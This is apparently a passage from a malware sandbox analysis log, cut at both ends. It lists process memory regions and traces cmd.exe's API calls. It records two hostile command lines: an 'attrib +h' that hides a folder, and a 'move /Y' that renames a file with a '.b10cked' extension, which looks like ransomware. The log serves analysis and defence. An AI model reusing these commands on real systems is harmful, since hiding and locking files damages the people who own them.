"c:\\windows\\system32\\rpcrt4.dll") Region: id = 20018 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20019 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20020 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20021 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20022 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20023 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20024 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20025 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20026 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20027 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20028 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20029 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 305 os_tid = 0xca8 Process: id = "243" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0x300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20030 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20031 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20032 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20033 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 20034 start_va = 0xec0000 end_va = 0xec6fff entry_point = 0xec0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20035 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20036 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20037 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20038 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 20039 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20040 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20041 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20042 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 20043 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20044 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 20045 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20046 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20047 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20049 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20050 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20051 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20052 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20053 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20054 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20055 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20056 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20057 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 20058 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20059 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 306 os_tid = 0xce8 Process: id = "244" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20144 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20146 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 20147 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20148 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20149 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20150 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20151 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 20152 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20300 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20301 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20302 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20303 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 20304 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 20305 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20306 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20307 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20308 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20314 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20315 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20317 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20318 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 20319 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 20320 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 20321 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 20322 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 20323 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 307 os_tid = 0xc38 [0152.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa34 | out: lpSystemTimeAsFileTime=0x24fa34*(dwLowDateTime=0x949c9740, dwHighDateTime=0x1d440a9)) [0152.125] GetCurrentProcessId () returned 0xbec [0152.125] GetCurrentThreadId () returned 0xc38 [0152.125] GetTickCount () returned 0x2ef2e [0152.125] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa2c | out: lpPerformanceCount=0x24fa2c*=20891459365) returned 1 [0152.126] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.126] __set_app_type (_Type=0x1) [0152.126] __p__fmode () returned 0x76b331f4 [0152.126] __p__commode () returned 0x76b331fc [0152.126] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.126] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.127] GetCurrentThreadId () returned 0xc38 [0152.127] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc38) returned 0x38 [0152.127] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.127] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.127] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.127] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9c4 | out: phkResult=0x24f9c4*=0x0) returned 0x2 [0152.127] VirtualQuery (in: lpAddress=0x24f9fb, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0152.127] GetConsoleOutputCP () returned 0x1b5 [0152.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.128] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.128] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.128] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.129] GetEnvironmentStringsW () returned 0x420178* [0152.129] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0152.129] GetEnvironmentStringsW () returned 0x420178* [0152.129] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0152.129] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e934 | out: phkResult=0x24e934*=0x40) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0xa0, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x0, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegCloseKey (hKey=0x40) returned 0x0 [0152.130] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e934 | out: phkResult=0x24e934*=0x40) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x0, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegCloseKey (hKey=0x40) returned 0x0 [0152.130] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.130] srand (_Seed=0x5b88637a) [0152.130] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" [0152.130] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" [0152.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.131] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.131] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.131] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.131] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.131] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.131] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.131] GetEnvironmentStringsW () returned 0x4222c8* [0152.131] FreeEnvironmentStringsW (penv=0x4222c8) returned 1 [0152.131] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.131] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.131] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.131] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.131] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0152.132] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.132] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.132] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.132] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0152.132] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.132] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.132] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f700, lpFilePart=0x24f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f6fc*="Desktop") returned 0x18 [0152.132] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 